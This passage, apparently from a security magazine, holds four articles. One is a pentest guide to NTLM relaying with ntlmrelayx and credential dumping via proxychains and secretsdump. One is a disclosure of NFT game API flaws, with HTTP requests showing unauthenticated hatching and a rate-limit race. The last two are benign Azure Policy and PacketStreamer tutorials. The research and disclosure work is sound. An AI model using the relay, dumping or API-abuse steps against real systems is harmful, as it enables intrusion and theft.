Next off, we can start NTLMrelayx on a new tab alongside Responder or mitm6 but in case we successfully manage to relay hashes, we will need to tweak some settings if we'd like to interact with the victim hosts. The config file we need to tweak can be found at “/etc/proxychains4.conf” within our Kali Linux (make sure you’re root already). Go to the very end and comment out the localhost with port 9050 and instead, add a new one with port 1080. It should look like this:

Edit the Kali's proxychains4 like this

Once this is done, feel free to run NTLMrelayx (again alongside with Responder or mitm6) on a different tab to try to relay those hashes.

impacket-ntlmrelayx -tf no-sign.txt -c "ipconfig" -socks -smb2support

(Will relay hashes to hosts that don't require SMB signing (no-sign.txt) using my IP as the attacking server (192.0.1.145) and run “ipconfig” on successful relaying)

I have been receiving some errors recently from NTLMrelayx regarding Flask, so before you run it, make sure to upgrade Flask within the Kali as root:

apt-get update
apt-get install --only-upgrade python3-flask

If NTLMrelayx complains that port 1080 is in use, you can try killing it with: fuser -k 1080/tcp

Example:

NTLMrelayx running

NTLMrelayx will be running and notify us when it has successfully relayed a hash. We can determine this by pressing the RETURN key (ENTER) on the same tab that NTLMrelayx is running and typing "socks". The hosts that we managed to successfully relay hashes at will be presented with TRUE under the Adminstatus:

NTLMRelayx managed to relay hash to 192.0.1.105

Now that we have an open session on this host, we can try to interact with it in various ways, however, for the sake of the assessment's timeframe, and for lateral movement, we will be attempting as mentioned before to dump hashes or cleartext passwords from memory. In order to do this, we will be utilizing the secretsdump tool also found within the Impackets library. Open a new tab, unlock the Kali tools and edit your proxychains file as before; we will be making use of the proxychains command to interact with the host and dump credentials:

Dumped cleartext password from a host we relayed hashes to

In the real-world, user credentials you can dump could be indeed a Domain Administrator, providing us with a quick win followed by the extraction of NTDS.dit and further password analysis. If you kept reading until now, you should have a solid idea on how to start with internal assessments and get your first foothold. Note that this guide is not exhaustive and there are also other attacks you could utilize by researching.

References:

https://hausec.com/pentesting-cheatsheet

https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin

https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i

https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/llmnr-nbt-ns-poisoning/smb-relay

https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html

https://www.windows-commandline.com/add-user-to-domain-group

https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/ipv6-attacks/basic-attack

https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/exploitation/exploit-without-account/smb-relay

https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/

https://abarrak.gitbook.io/linux-sysops-handbook/#shell-tips-and-tricks

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

https://mayfly277.github.io/assets/blog/pentest_ad.svg

https://github.com/Orange-Cyberdefense/arsenal/tree/master/mindmap

https://securityboulevard.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind/

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

https://www.kitploit.com/2018/02/mitm6-pwning-ipv4-via-ipv6.html?m=0

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/ldap-relay

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

https://hideandsec.sh/books/cheatsheets-82c/page/active-directory [cheatsheet]

https://hideandsec.sh/books/cheatsheets-82c/page/mssql [cheatsheet]

https://hideandsec.sh/books/cheatsheets-82c/page/wmi

by Marlon Fabiano of CySource

The success of the game Axie Infinity sparked a massive wave of Play to Earn or "play to win" that has reached most of us. Until now, the term NFT, or non-fungible token, was only related to images of famous artists like Beeple, or to the sought-out collection of cryptopunks. The privilege of making money playing video games was restricted to big YouTubers and pro-players. However, with Axie Infinity, the dream job of making money playing video games was opened to everyone. Anyone can have fun playing and earning money with NFTs.

The idea of this dream job was so well received by the community at large that more and more games started popping up almost instantly, one after the other. A flood of games has been created, even more than the number of players who are aware of this possibility.

With regards to De-Fi, which enables the delivery of financial services without the need for any intermediary, Dapp enables the creation of decentralized applications based on the blockchain. Taking advantage of this freedom, "NFT games" grew in the shadow of these concepts since anyone could create a game without the need for subject matter experts, such as software development, infrastructure, or even security professionals. But from a security point of view, what does this mean?

Note: Many of the released NFT games are short-lived. Almost all ended before six months of existence, with a few exceptions.

It is worth remembering that NFT games are not just games. These are high risk investments and should not be understood as easy money. Any type of investment must be analyzed by the investor himself in a technical and conscious way.

About the anonymity

The two sides of anonymity:

Along with blockchain-based applications came the possibility of anonymity. There are many great projects where developers and companies remain anonymous, but some scammers take advantage of this possibility to apply their scams with even less exposure. This doesn’t mean that just because a project is anonymous it's definitely malicious. And in the same way, a project that brings the names and photos of its developers isn’t necessarily a safe project either.

Anonymity is great for developers' protection. In many cases, even though the project is not a scam, if it goes south the developers can still get attacked by angry customers.

But what can you do when it is necessary to contact the company and the developers who remain anonymous? What then? You’re stuck. The closest to "support" for the game will be the mods (moderators) who have telegram and discord channels. And often the moderators are volunteers who are willing to control the communication channels, some don’t even have direct access to the developers. It is worth remembering that game mods are mostly just ordinary people who help control the so-called FUD (Fear, Uncertainty and Doubt) that can be spread by dissatisfied players, which can cause a herd effect that harms the game by causing the token to drop.

However, although this has rendered questioning actual problems in some games virtually impossible, it has allowed and encouraged all kinds of phrases, memes and anything that speaks well of the game, even if they are false. That's why it's so common to see meme pictures with photos of cars, houses, and celebrities with the message "Thank you + the name of the game" on channels.

In this way, the channels remain almost like a cult in which it is only possible to say one thing: "this game is going to the moon”. Going to the moon is a term used to describe stocks, cryptocurrencies, and NFTs that are expected to rise extremely high in value. Those who disagree are usually banned from the channels. Therefore, even if the game is going bankrupt, the repetition of positive phrases can bring in new players to be the base and remove the loss or generate more profit for the older players who entered first.

Risks in NFT games:

There are some known risks from an investment perspective, however, this article will not address those, and instead focus on the security aspect.

And from a security point of view, there are some well-known attacks designed to steal cryptocurrencies from the most unsuspecting:

Phishing: one of the best-known techniques in the cybersecurity world, in which attackers trick a victim and retrieve his password in order to steal money or data. Here the idea is to make the victim connect their wallet to fraudulent websites or to share sensitive information such as a private key or passphrase. Thus, the attacker can access the victim's wallet and steal their cryptocurrencies.

In this case, the solution is to avoid connecting your wallet to unknown websites. Watch out for sites that try to imitate DEX like pancakeswap or a new game that is about to be released.

Rug pull: it's an attack similar to phishing, but a rug pull can occur from a famous project that didn't work or from large projects created to slowly steal from players, as was the recent case of three click games that had been selling the project tokens illicitly without the players’ knowledge. A rug pull can be created with the intention of spoofing a real project, and liquidity can be added to the pool to make it look like a real token. However, after the victims buy the token, they are no longer able to sell it, as the token contract is set so that if the wallet they are selling is not the project owner's wallet, they will have to pay a fee. And the value of this fee is 100%. As a result, there are no tokens left for sale, thus causing an error at the time of sale. Then the victim can no longer get his money back.

In this case, the solution is: always buy tokens through contracts on the project website. This alone does not guarantee that the project cannot be a rug pull. Do other validations such as checking the liquidity in the pool, see if the sales are from different wallets and not from the project owner wallet. Beware of abnormal increase and appreciation from 0x to 20x in a few hours, as this "skyrocketing" could very well be a scam. Check all wallets from the project to see if there is a possibility for developers to sell tokens at any time in the so-called "pull of the rug".

About Blockchain security:

When we think of blockchains, we have the idea of security and immutability. So, are NFT games that are built on the blockchain safe?

First, let's think about the basics of the idea of an NFT.

When you buy an avatar NFT, you are buying their property. So as a "non-fungible token" nobody but you has access to that avatar, right? Wrong! Anyone can access your avatar image, download and modify it locally so that it becomes another NFT, and can later sell it. But this will not change your already purchased avatar in any way.

So, can we conclude that your avatar would be immutable?

To understand this, we need to understand that what we bought was not the image, but the hash that references the image. Or rather, in the transaction hash, we will now have the new owner who will be the new buyer wallet. But the image is located on any host that runs a web server like any other common host. So, if a hacker breaks into this server, they can change your avatar to a picture of a guy with a horse's head, for example. This doesn't seem so immutable.

A recent proof of concept by Moxie Marlinspike showed us that immutable can be a bit of a misconception. In the test, Moxie created an NFT that was hosted on their host. And depending on the IP or User-Agent from which the request was made, the server showed a different image. In OpenSea it was shown one, in Rarible another, and in the wallet itself another image was shown. All this with the same reference hash.

Now bringing NFT into the world of Play to Earn, we have the concept of NFT games. But the "NFTs" of these games can be fungible, just like any Token. To show this, we can bring recent play to earn games like Bombcrypto, LunaRush, CryptoShips, etc. Everyone comes up with the idea of working with NFTs, but what we see is an even more imprecise concept than we've seen before. In these games, it is quite common to see a player with the same NFT as another player. The only difference is the player’s ID. So, in the same way that we saw earlier, the player doesn't buy the hero, item, or skin, but rather he only buys the ID. But IDs and unique identifiers are something we've seen for a long time in common applications that we use on a daily basis. But in terms of security, can the same vulnerabilities that affect old applications that use unique identifiers also affect NFT games?

As a case study, Cysource randomly chose some NFT games for a technical analysis.

Infinite Monster

Starting with the Monsta Infinite game:

This game is very similar to Axie Infinity, but has not yet been released at the time of writing.

Describing the vulnerability:

When the purchase of monster eggs was released, it was possible to choose the ID of the egg that would be purchased. Just like in a store. This is great for giving the player a sense of choice. The problem appeared when we tried to open (or incubate as they call it) the egg. Let's analyze the NFT opening request:

POST /hatch HTTP/2
Host: REDACTED.execute-api.ap-southeast-1.amazonaws.com
Content-Length: 15
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json
Dnt: 1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://marketplace.monstainfinite.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referrer: https://marketplace.monstainfinite.com/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en;q=0.8,es;q=0.7

{"token_id":1337}

We can see the first problem in the request. There is no kind of token to authenticate and authorize the opening of the egg. Anyone could hatch the NFT without having to log in with their wallet. Seeing the NFT content of each ID doesn't seem like something with such an impact, but when we think of the fact that each ID has a specific combination of powers, stats and "purity" (rarity of monster parts), it becomes extremely impactful. An attacker could visualize what the NFT was even before buying it and use it to their own benefit and advantage. An attacker could buy all the most expensive NFTs and resell them later for a high price, as he would be the sole holder of the rarer NFTs.

PoC:

Opening unbought NFTs
Viewing the contents of the referenced ID

The vulnerability was reported to the game's mods and has since been patched.

Monster Grand Prix

Another game that was chosen for the case study was MonsterGrandPrix, which lasted a short time.

The game was a click game that allowed two races a day for each tamer + monster duo. To play the game, the player needed to invest 170 dollars to buy one trainer and one monster to run, and depending on the position in which the race ended, he was rewarded with more or less $MGPX token.

MonsterGrandPrix NFT
players racing

Every time we ran a run, the following request was sent:

POST /api/v1/game/play_racinggame HTTP/2
Host: app.monstergrandprix.io
Cookie: token=REDACTED_JWT; __cf_bm=cookie
Content-Length: 35
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Dnt: 1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://app.monstergrandprix.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.monstergrandprix.io/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en;q=0.8,es;q=0.7
Connection: close

{"monsterId":631337,"tamerId":601337}

And we received the answer with the result of the race informing what happened during the race (powers of the  used) and the position that the monster was in.

Exploiting a misconfigmonstersuration in traffic limit control, we sent several requests directly to the API, and until the backend registered that we had already done the two runs of the day, we had already managed to perform dozens of runs.

Taking the day’s average price, it was possible to earn 70 dollars for every 10 requests sent to the API. It would be possible to make a considerable profit in just a few requests and steal the liquidity of the entire game pool.

It is worth considering that the value of the token reached almost 200 dollars:

MGPX token value on test day

We tried to report the vulnerability to the game mods, as the developers were anonymous, but we got no response. According to later announcements, the game had all the liquidity in the pool stolen (which some people believe was a ploy by the developers) and after they created the third version of the token, the game was over. This made many players think that this game was never intended to be a play-to-earn game, but it was always a rug pull. However, as we are only showing vulnerabilities involving the game and not analyzing the contract and the game project, we will not address whether it was a scam or not.

PoC:

{
 "status" : {
   "code" : "200" ,
   "message" : ""
},
 "date" : [
{
     "id" : "48003ddf-8c3e-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.515Z" ,
     "updatedAt" : "2021-11-03T20:18:14.516Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "41941a5f-34c8-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.505Z" ,
     "updatedAt" : "2021-11-03T20:18:14.505Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},
{
     "id" : "2159e65a-a354-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.501Z" ,
     "updatedAt" : "2021-11-03T20:18:14.501Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "bf302a55-1060-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.483Z" ,
     "updatedAt" : "2021-11-03T20:18:14.483Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "0d73be2b-1a31-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 3 ,
     "createdAt" : "2021-11-03T20:18:14.471Z" ,
     "updatedAt" : "2021-11-03T20:18:14.471Z" ,
     "amount" : "0.1419" ,
     "accountType" : "C"
},
{
     "id" : "b79a89ab-4f78-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 5 ,
     "createdAt" : "2021-11-03T20:18:14.458Z" ,
     "updatedAt" : "2021-11-03T20:18:14.459Z" ,
     "amount" : "0.1064" ,
     "accountType" : "C"
},
{
     "id" : "1e6334a1-4707-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 4 ,
     "createdAt" : "2021-11-03T20:18:14.443Z" ,
     "updatedAt" : "2021-11-03T20:18:14.444Z" ,
     "amount" : "0.1241" ,
     "accountType" : "C"
},
{
     "id" : "f62c83dd-23c8-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 7 ,
     "createdAt" : "2021-11-03T20:18:14.423Z" ,
     "updatedAt" : "2021-11-03T20:18:14.424Z" ,
     "amount" : "0.0532" ,
     "accountType" : "C"
},
{
     "id" : "ea8bc7e2-66ca-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 7 ,
     "createdAt" : "2021-11-03T20:18:14.405Z" ,
     "updatedAt" : "2021-11-03T20:18:14.405Z" ,
     "amount" : "0.0532" ,
     "accountType" : "C"
},
{
     "id" : "5704ea40-bd6e-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.370Z" ,
     "updatedAt" : "2021-11-03T20:18:14.370Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},
{
     "id" : "1563d8d0-3e79-XXXX-XXXX-XXXXXXXXXXXX" ,
     "userId" : "h4x0r" ,
     "tamerId" : 601337 ,
     "monsterId" : 631337 ,
     "txnType" : "Play" ,
     "note" : "Play Monster Grandprix" ,
     "numBuy" : null ,
     "itemType" : null ,
     "rewardsGain" : null ,
     "playerRank" : 6 ,
     "createdAt" : "2021-11-03T20:18:14.347Z" ,
     "updatedAt" : "2021-11-03T20:18:14.347Z" ,
     "amount" : "0.0887" ,
     "accountType" : "C"
},

Risecity

We've identified another flaw in the game RiseCity. This game intended to bring back old resource management games like Simcity, but with the promise that it would pay the player for their efforts to keep the city running.

RiseCity

The reward was based on the type of house the player owned. However, at the time of claiming the reward, it was possible to change the rarity ID of the NFT and thus obtain greater profits than what should have been received. We tried to contact the game developer in several ways, but we got no answers. The game was so exploited in many different ways that there was an arrest NFT for wallets that were accused of hacking or exploiting the rewards.

TurtleRacing

In the TurtleRacing game, which is based on the tale of "The Tortoise and the Hare", players buy their NFTs and race against other turtles in search of the $TURT token.

TurtleRacing

We identified a way to bypass the race control of each NFT, which was only two races a day, and were able to perform more races than allowed, thus enabling us to increase the earnings from each NFT.

Races held by the same NFT, exceeding the two-race limit

The vulnerability was reported to one of the project's mods who understood the impact and managed a direct bridge with the game's developers. The developers thanked us for the report and fixed the vulnerability as quickly as possible.

Conclusion:

What the NFT games brought is remarkable, giving people the hypothetical possibility to make profits even from their homes in this time of pandemic. Mothers who take care of their children during the day can simultaneously play games to earn extra income. People from relatively poor places can change their lives and live in a better way. Anything that helps the human being to become a better version of himself should be admired.

However, we cannot ignore the fact that games are appearing from all over the world, trying to get a share of this lucrative (and risky) market, and that these games hardly ever care about security.

In this way, a single person could end up with a whole game or end up with the liquidity of the whole pool. This was the case with the game CryptoBurger, in which the developers forgot to segment the call of the burn function that allowed you to burn the tokens. This allowed the hacker to burn all the tokens in the pool, (https://poocoin.app/tokens/0xf40d33de6737367a1ccb0ce6a056698d993a17e1) and to sell his tokens at a high price for a considerable profit.

Similarly, the lack of security can expose your NFTs to other malicious actors that can profit illegally through exploits, causing the game to "bleed" to destruction.

What we want to point out is that contract auditing must be performed to identify logic or security errors. But also that this contract is integrated with a frontend and a backend. Smart contract security doesn't mean much if your application is vulnerable, and vulnerabilities can leave both the developers and their players exposed.

by Almu Gómez Sánchez-Paulete

When we talk about cybersecurity, the image of a person with a hood in front of black screens and white lines (or green, which are cooler) comes to mind, and we don’t always take into account that cybersecurity encompasses much more than knowing how to attack a system (Red Team). It is also important to design a secure architecture and know how to apply compliance controls to help carry out a risk plan and manage vulnerabilities in the infrastructure. If you add a cloud architecture, we find ourselves with the exciting world of “Cybersecurity Compliance on Cloud”.

Cybersecurity Compliance reaches from legal controls of confidentiality, integrity and availability of data, as well as the use of tools and application of processes that help in these controls.

In a cloud-based architecture with Microsoft Azure, we have multiple tools that will help us in this process (Azure Role Based Access Control, Azure Group Administration, Azure Blueprints...). In this first article, we will talk about Azure Policies and how they can help us monitor the compliance of our infrastructure.

These tools fall under the control of Azure Governance, which, in general terms, is the way to control how a group of users access certain resources, and for how long.

The first thing is to know what Azure Policies are and how they can help us.

They are a series of rules that will help us maintain consistency in the infrastructure.

What can lead us to make use of them?

  • Regulatory Compliance
  • Controlling cost
  • Maintain security and performance consistency

These rules will allow the following actions to be carried out once they are evaluated:

  • Append
  • Audit
  • AuditIfNotExists
  • Deny
  • DeployIfNotExists
  • Disabled
  • Modify

For example, if we don't want any resources to be deployed in the “Test” resource group without the “test” tag and value, the rule will deny this action on deployment, which is useful in large infrastructures with different teams working on top of each other with one or several subscriptions having to meet a minimum structure for the organization.

This service has no additional cost, and by default, Azure provides a series of already created policies in which you only need to assign them and indicate the action to be taken.

These rules can be grouped into sets called "initiatives", and of which Azure also offers us some by default for checking compliance with certain standards, such as NIST, the CIS Microsoft Azure Benchmark:

Also, you can create your own sets of rules so that with a simple assignment on a subscription, or group of resources, you can control all the rules you require.

But we are going to focus on the possibility of creating custom Azure Policies for our environment, for this, we have to know:

  • What language do you use? JSON
  • What permissions does the user require to manage these policies?

Action Type

Operation

Description

Action

Microsoft.Authorization/policyDefinitions/read

Get information about a policy definition.

Action

Microsoft.Authorization/policyDefinitions/write

Create a custom policy definition.

Action

Microsoft.Authorization/policyDefinitions/delete

Delete a policy definition.

Action

Microsoft.Authorization/policyAssignments/read

Get information about a policy assignment.

Action

Microsoft.Authorization/policyAssignments/write

Create a policy assignment at the specified scope.

Action

Microsoft.Authorization/policyAssignments/delete

Delete a policy assignment at the specified scope.

Action

Microsoft.Authorization/policyExemptions/*

Create and manage policy exemptions.

Action

Microsoft.Authorization/policySetDefinitions/*

Create and manage policy sets.

What parts does a policy in json format consist of? We have two different parts in the code:

  • The declaration of the rules: determines how the policy will behave (effect) once their condition is fulfilled
  • The declaration of the parameters: the definition of the values ​​that the policy must comply with.

With these clear points, let's get down to business!

We are going to create a simple custom policy that forces a label to be set on the resources. To do this, we will write the JSON and then import it with PowerShell to our Azure account, and from the Azure Portal, we will verify that it has been created correctly.

First, we will create two files:

  • parameters.json
  • Rules.json

In the parameters.json file, we will define the default value of the label that we require with this rule; in our case, it will be the value “test”.

{
"tagName": {
"type": "String",
"metadata": {
"displayName": "Mandatory Tag [test]",
"description": "Name of the tag, such as [test]"
},
"defaultValue": "test"
},
"effect": {
"type": "String",
"defaultValue": "Deny",
"allowedValues": [
"Audit",
"Deny",
"Disabled"
],
"metadata": {
"displayName": "Effect",
"description": "The effect determines what happens when the policy rule is evaluated to match"
}
}
}
{
"if": {
"allOf": [
}
"field": "[concat('tags[', parameters('tagName'), ']')]",
"exists": "false"
}
]
},
"then": {
"effect": "[parameters('effect')]"
}
}

Now, we are going to verify that the JSON is correctly structured and that it is correctly imported into our Azure account, for this, we will need:

  • PowerShell 7.0.6 LTS or PowerShell 7.1.3
  • Install the latest version of PowerShell available for your operating system latest version of PowerShell
  • PowerShell script execution policy must be set to remote signed or less restrictive
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Use the Install-Module cmdlet, as it is the preferred installation method for the Az PowerShell module.

Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Once we have all these points, we connect to our Azure account.

  1. Connect Azure Account with PowerShell

Connect AzAccount.

  1. Select subscription to work
Get-AzContext
Set-AzContext NAME OF YOUR SUBSCRIPTION
  1. The command to make a new Azure policy definition is:
$definition = New-AzPolicyDefinition -Name "" -DisplayName "" -description "" -Policy '' -Parameter '' -Mode

The mode can be indexed or all; this will determine what types of resources are evaluated by the policy.

all: evaluate resource groups, subscriptions, and all resource types

indexed: only evaluate resource types that support tags and location

I recommend uploading it to a github repository, and from raw mode, indicate the path where each file is located:

$definition = New-AzPolicyDefinition -Name "test" -DisplayName "Test" -description "Test" -Policy 'https://raw.githubusercontent.com/asanchezpaulete/Articles/main/Azure%20Policies/rules.json' -Parameter 'https://raw.githubusercontent.com/asanchezpaulete/Articles/main/Azure%20Policies/parameters.json' -Mode Indexed

And we can see, it created through the Azure Portal.

We are now going to check its operation, we are going to try to create a resource without a label to see if it will let us, remember that its default value is “Deny”.

To do this, we will first create a resource group in which we will assign this directive.

Home > Policy > Select policy > Assign

We will indicate the following:

  • Scope
  • Exclusions (if any)
  • Parameters to select the policy mode
  • In our case, we will not apply any remediation task, since our goal is to prevent us from creating the resource without the tag
  • Non-compliance message that will appear to the user who tries to break this rule

We proceed to create a vnet without label:

In the validation step, it will indicate that the test has not passed and that we should review the details, where we can see that it is because the policy is preventing the creation of this vnet with this configuration:

Let's create it now with the labels with the required value:

And with the labels established, we have passed the validation phase:

But we are not only denying the creation of resources if they do not comply with a certain structure, Azure Policies can also be useful to analyze an already deployed infrastructure, or in "Audit" mode to only evaluate compliance and not apply any effect of denial or modification. To do this, we will have to take into account that evaluations of assigned policies and initiatives happen as the result of various events:

  • A policy or initiative is newly assigned to a scope (takes around 30 minutes)
  • A policy or initiative already assigned to a scope is updated
  • A resource is deployed or updated within a scope with an assignment via Azure Resource Manager, REST API, or a supported SDK
  • A subscription is created or moved within a management group hierarchy with an assigned policy definition targeting the subscription resource type
  • A policy exemption is created, updated or deleted
  • Standard compliance evaluation cycle (once every 24h)
  • The guest configuration resource provider is updated with compliance details by a managed resource
  • On-demand scan

To launch an evaluation on demand, we must follow the following steps:

  • PowerCli
az policy state trigger-scan --resource-group "YOUR_RESOURCE_GROUP"

$job = Start-AzPolicyComplianceScan -AsJob
$job

In general, the results of a policy evaluation will be compliant or non-compliant.

When a resource is non-compliant, Azure provides us with three ways to look for information to find out why it is non-compliant:

  • Compliance details
  • Change history
  • Custom PowerShell Script

But this is for another article, along with the Policies with Remediation Task and managed identities and service principals…

 

by Owen Garrett, Deepfence

PacketStreamer is an open source project from Deepfence.  It performs distributed packet capture (tcpdump-like) and aggregates the pcap data in a single pcap file.  PacketStreamer supports a wide range of environments, including Kubernetes nodes, Docker hosts, Fargate instances and, of course, virtual and bare-metal servers.

Network packet capture is a well understood practice. The basic technology that modern tools are built on first appeared in a tool named ‘tcpdump’, released in 1988, and the associated file format (pcap) has stood the test of time.

Although the technology has changed little, modern compute environments are very different from the single-Unix-server assumptions that defined the design of tcpdump.  Modern environments are cloud-based, distributed across many servers, and use virtualization technologies that make it difficult to run kernel tools such as tcpdump directly.

PacketStreamer applies contemporary network capture to modern, cloud-native environments. It captures traffic from large numbers of remote servers (for example, cloud nodes) and collects that traffic in one place. It supports modern stacks, such as Kubernetes (via a daemonset), Docker, and AWS Fargate, as well as standard hosts.

Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple machines for central logging and analysis:

  • Debugging: intermittent errors are happening and your log files don’t reveal enough details. You need to gather network traffic to see what requests your servers are processing.
  • Forensics: you want to capture traffic to sensitive services for storage and later inspection in the event of an investigation. 
  • Threat hunting: you want to identify any unusual behavior that may indicate the presence of adversaries. 
  • Machine learning: you need to capture large volumes of network traffic from many production servers to train machine learning engines to recognize normal and anomalous traffic.

Getting Started with PacketStreamer

We’ll share a walkthrough of building, installing and running PacketStreamer, and see what we find.

We’ll start with four cloud servers.  Three are honeypot servers, running WordPress, a simple NGINX hello-world, and honeydb.io.  The fourth will be our receiver server where we aggregate and analyze the packet data.

Build PacketStreamer

On the build (receiver) server, let’s clone the source and build PacketStreamer.  It’s a standalone Golang app, and we’ll statically-link the build to make it as portable as possible:

# install the necessary build tools (Debian/Ubuntu; other OSs will differ)

sudo apt install -y build-essential golang-go libpcap-dev

# Get the source (github) and build a statically-linked binary

git clone https://github.com/deepfence/PacketStreamer.git

cd PacketStreamer/

make STATIC=1

# verify we have a statically-linked binary

file packetstreamer

packetstreamer: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, not stripped

Deploy the receiver

In one terminal on the receiver server, let’s start the PacketStreamer receiver process and pipe the pcap output into tshark.  We can use the included receiver-stdout.yaml configuration file, which configures the receiver to accept traffic on port 8081:

./packetstreamer receiver \
--config ./contrib/config/receiver-stdout.yaml | tshark -r - -Y http

The PacketStreamer receiver process will run quietly, waiting for connections from remote PacketStreamer sensors.  Pcap output from PacketStreamer will be piped to the tshark tool.

You could instead write the output to a file for later analysis, or even tee it to a file while watching using tshark. That way, you can quickly spot anomalies (tshark output) and investigate the full packet dump.

Deploy the sensors

Now, let’s deploy the sensors on each of our target servers.  We first need to create a simple configuration file sensor-remote.yaml that identifies the location of the remote receiver:

output:
server:
address: 12.34.56.78
port: 8081
pcapMode: all

Copy the PacketStreamer binary and the sensor-remote.yaml configuration file to each of the target servers:

scp packetstreamer sensor-remote.yaml user@wordpress:/tmp
scp packetstreamer sensor-remote.yaml user@nginx:/tmp
scp packetstreamer sensor-remote.yaml user@honeypot:/tmp

Then run the sensors on the remote machines:

ssh root@wordpress

# as root on the target machine:
/tmp/packetstreamer sensor --config /tmp/sensor-remote.yaml 

Repeat for the nginx and honeypot machines.

Analyzing the results

